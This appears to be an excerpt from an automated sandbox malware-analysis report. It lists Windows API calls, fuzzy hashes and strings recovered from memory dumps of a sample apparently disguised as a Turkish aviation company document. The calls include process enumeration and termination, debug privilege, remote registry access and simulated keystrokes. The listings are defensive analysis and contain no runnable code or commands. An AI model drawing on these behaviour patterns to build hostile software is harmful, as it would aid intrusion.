                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FF96B7
                                                                                                                                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FF96D5
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FF96D8
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FF96E1
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FF96F8
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FF96FB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2014098862-0
                                                                                                                                    • Opcode ID: 03dd5c3b570503773eb0c6edd82ad8833451038d5b294ea7c1ada9da20856aaa
                                                                                                                                    • Instruction ID: 101b5bb63a9ba96aa2be30730202df7b53e38d4dade395f355ffb105ea822cc1
                                                                                                                                    • Opcode Fuzzy Hash: 03dd5c3b570503773eb0c6edd82ad8833451038d5b294ea7c1ada9da20856aaa
                                                                                                                                    • Instruction Fuzzy Hash: B711ACB1910219BAF6306F70DC89F6A7A2DEB4C791F600415F384AB0A4CAF75C10DBA4
                                                                                                                                    APIs
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FF853C,00000B00,?,?), ref: 00FF892A
                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00FF853C,00000B00,?,?), ref: 00FF8931
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FF853C,00000B00,?,?), ref: 00FF8946
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00FF853C,00000B00,?,?), ref: 00FF894E
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00FF853C,00000B00,?,?), ref: 00FF8951
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FF853C,00000B00,?,?), ref: 00FF8961
                                                                                                                                    • GetCurrentProcess.KERNEL32(00FF853C,00000000,?,00FF853C,00000B00,?,?), ref: 00FF8969
                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00FF853C,00000B00,?,?), ref: 00FF896C
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00FF8992,00000000,00000000,00000000), ref: 00FF8986
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1957940570-0
                                                                                                                                    • Opcode ID: 17012222bbaa939442b63e1b72a861c3a3d567e4f7ac78a5f1e55747ad00da16
                                                                                                                                    • Instruction ID: fc3f335b94a4e315ca1486092fb20efae0123098045d89b12021fe6059f60fe6
                                                                                                                                    • Opcode Fuzzy Hash: 17012222bbaa939442b63e1b72a861c3a3d567e4f7ac78a5f1e55747ad00da16
                                                                                                                                    • Instruction Fuzzy Hash: 4201FF75240308BFE730AFA5DC4EF677B6CEB89750F604410FA04DB195CA759800CB20
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                    • API String ID: 0-572801152
                                                                                                                                    • Opcode ID: ad75fb491080a8416482130d866be654a0cedd4be75d2316a2a6a9650235aad4
                                                                                                                                    • Instruction ID: 5fcf705b513fa660d4bca170e587f60dde1efb2e3c4dff9d37c5f4c5519ade15
                                                                                                                                    • Opcode Fuzzy Hash: ad75fb491080a8416482130d866be654a0cedd4be75d2316a2a6a9650235aad4
                                                                                                                                    • Instruction Fuzzy Hash: F2C1D571A0020A9FDF10DF98C894BEEB7F5FF48318F148469EA85AB285E775AD40CB50
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                    • API String ID: 2862541840-625585964
                                                                                                                                    • Opcode ID: da0eeb744b6c5ccbf5b07686ad46190225736f0a9dbb0ba949518ee750a2ac7c
                                                                                                                                    • Instruction ID: 8f055e3e459a5479f1aaad294c08904720d1224bab1f7ece3549a86194cc5202
                                                                                                                                    • Opcode Fuzzy Hash: da0eeb744b6c5ccbf5b07686ad46190225736f0a9dbb0ba949518ee750a2ac7c
                                                                                                                                    • Instruction Fuzzy Hash: BB91B171A00205ABDF24CFA5C858FAEBBB8EF45718F00855DF945AB284D7789941CFA0
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FF710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?,?,00FF7455), ref: 00FF7127
                                                                                                                                      • Part of subcall function 00FF710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7142
                                                                                                                                      • Part of subcall function 00FF710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?,?), ref: 00FF7150
                                                                                                                                      • Part of subcall function 00FF710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FF7044,80070057,?), ref: 00FF7160
                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01019806
                                                                                                                                    • _memset.LIBCMT ref: 01019813
                                                                                                                                    • _memset.LIBCMT ref: 01019956
                                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01019982
                                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0101998D
                                                                                                                                    Strings
                                                                                                                                    • NULL Pointer assignment, xrefs: 010199DB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                    • API String ID: 1300414916-2785691316
                                                                                                                                    • Opcode ID: eca49ceea6b24e0021c964d8f369492b1e18c550f1e002d8873ba8292d080c09
                                                                                                                                    • Instruction ID: 05ae456b2acc661ba762162f66d90ded8761c7729de8546978293831f6e4c934
                                                                                                                                    • Opcode Fuzzy Hash: eca49ceea6b24e0021c964d8f369492b1e18c550f1e002d8873ba8292d080c09
                                                                                                                                    • Instruction Fuzzy Hash: 33914771D00229EBDB10DFA5CC90EDEBBB9AF09750F20415AF519A7281DB75AA04CFA0
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01026E24
                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 01026E38
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01026E52
                                                                                                                                    • _wcscat.LIBCMT ref: 01026EAD
                                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 01026EC4
                                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01026EF2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                                                                    • String ID: SysListView32
                                                                                                                                    • API String ID: 307300125-78025650
                                                                                                                                    • Opcode ID: a4c8d1475d5cbf0046025214aeefc17d69ff8a7fbcea3c2bef3eed533e01c5d4
                                                                                                                                    • Instruction ID: 2fd6813256b350b24433cd9e55ef0c07f2093da32bb578aa2dae33c1c89e5bec
                                                                                                                                    • Opcode Fuzzy Hash: a4c8d1475d5cbf0046025214aeefc17d69ff8a7fbcea3c2bef3eed533e01c5d4
                                                                                                                                    • Instruction Fuzzy Hash: 8F41A170900319EBEF219F68CC85FEE77F8EF08390F10046AF9C5A7291D67699848B60
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 01003C55: CreateToolhelp32Snapshot.KERNEL32 ref: 01003C7A
                                                                                                                                      • Part of subcall function 01003C55: Process32FirstW.KERNEL32(00000000,?), ref: 01003C88
                                                                                                                                      • Part of subcall function 01003C55: CloseHandle.KERNEL32(00000000), ref: 01003D52
                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101E9A4
                                                                                                                                    • GetLastError.KERNEL32 ref: 0101E9B7
                                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0101E9E6
                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0101EA63
                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 0101EA6E
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0101EAA3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                                    • Opcode ID: 1f5b46e941c41b074435a7936c508b559f0234e2177ecd4ec49758364065ce30
                                                                                                                                    • Instruction ID: 348961450ca891f57e37b6f94e895883f3f6cdbc69f6b01e552be25b14dc9305
                                                                                                                                    • Opcode Fuzzy Hash: 1f5b46e941c41b074435a7936c508b559f0234e2177ecd4ec49758364065ce30
                                                                                                                                    • Instruction Fuzzy Hash: F941CE712002019FDB26EF14CC95F6EBBE5AF45314F588458FA829F2D6CBBDA804DB91
                                                                                                                                    APIs
                                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 01003033
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconLoad
                                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                                    • Opcode ID: f4e26875cf3ae1c6b1fcb01b38e7e6b8e6f6fb0f77aa10ef57095bea44932248
                                                                                                                                    • Instruction ID: c4f4c100978cd1aa8c6e603fa05dcb4726524e89e426772a1ff0762bfcd29b09
                                                                                                                                    • Opcode Fuzzy Hash: f4e26875cf3ae1c6b1fcb01b38e7e6b8e6f6fb0f77aa10ef57095bea44932248
                                                                                                                                    • Instruction Fuzzy Hash: A7114631249346BEF757CA19DC42D6F3B9CEF05360F10406EFE40AA1C2DA645A0046A0
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 01004312
                                                                                                                                    • LoadStringW.USER32(00000000), ref: 01004319
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0100432F
                                                                                                                                    • LoadStringW.USER32(00000000), ref: 01004336
                                                                                                                                    • _wprintf.LIBCMT ref: 0100435C
                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0100437A
                                                                                                                                    Strings
                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 01004357
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                                    • Opcode ID: 7a1c868318c16d703696e3a1eca9354571f60036fc6511f70af6e0b82e03e29d
                                                                                                                                    • Instruction ID: 0fde3e72510e1534c5b68c354edb2f20e9d58da341cb7770b2a3d2476990d819
                                                                                                                                    • Opcode Fuzzy Hash: 7a1c868318c16d703696e3a1eca9354571f60036fc6511f70af6e0b82e03e29d
                                                                                                                                    • Instruction Fuzzy Hash: EF01A2F2900209BFE7719BA0DD89EEB777CEB08240F504095FB89E2041EA395E844B74
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0102D47C
                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0102D49C
                                                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0102D6D7
                                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0102D6F5
                                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0102D716
                                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 0102D735
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0102D75A
                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0102D77D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1211466189-0
                                                                                                                                    • Opcode ID: 69d131c8ece6814a21e3ac501afe941feefdd2f306a4d3f3426ac350cfe7edb3
                                                                                                                                    • Instruction ID: 3e5228dcbb32cd525ff821c07a5fc2cab25d472005d792c2b978813c9a2953d7
                                                                                                                                    • Opcode Fuzzy Hash: 69d131c8ece6814a21e3ac501afe941feefdd2f306a4d3f3426ac350cfe7edb3
                                                                                                                                    • Instruction Fuzzy Hash: 3AB17C71500225AFDF24CFA8C5897AD7BF1FF48701F0480A9ED889F299E779A950CB90
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                                                                                      • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0101FDEE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3479070676-0
                                                                                                                                    • Opcode ID: 3a668c07f4865e9070e79f1a65ddcb3b3d1c2687f5e26eba5c4abac0e4a4d4d3
                                                                                                                                    • Instruction ID: 37e7a7a203bc4cbd23e79523fb4be66fdb884d642f119f156ffa65e4d6000574
                                                                                                                                    • Opcode Fuzzy Hash: 3a668c07f4865e9070e79f1a65ddcb3b3d1c2687f5e26eba5c4abac0e4a4d4d3
                                                                                                                                    • Instruction Fuzzy Hash: 80A180712042029FDB10EF18CC90F6EBBE5AF45314F14841CF9969B292DB79E949DF41
                                                                                                                                    APIs
                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000), ref: 00FA2ACF
                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00FA2B17
                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000), ref: 00FDC21A
                                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FDC1C7,00000004,00000000,00000000,00000000), ref: 00FDC286
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ShowWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1268545403-0
                                                                                                                                    • Opcode ID: 26c1ff5b1fa326d4aa158779978073628c37822ca70ddcc3fcef75fdd2210497
                                                                                                                                    • Instruction ID: 667715faa497d45fee4e0aa471e90f4e7316cce3bb68e9f605b045672d765ef2
                                                                                                                                    • Opcode Fuzzy Hash: 26c1ff5b1fa326d4aa158779978073628c37822ca70ddcc3fcef75fdd2210497
                                                                                                                                    • Instruction Fuzzy Hash: 1141F172B046819BC7B55B3C9D8CB6B7BA3BF87360F28841DE08786551C67D9841F750
                                                                                                                                    APIs
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 010070DD
                                                                                                                                      • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                                                                                      • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 01007114
                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 01007130
                                                                                                                                    • _memmove.LIBCMT ref: 0100717E
                                                                                                                                    • _memmove.LIBCMT ref: 0100719B
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 010071AA
                                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 010071BF
                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 010071DE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
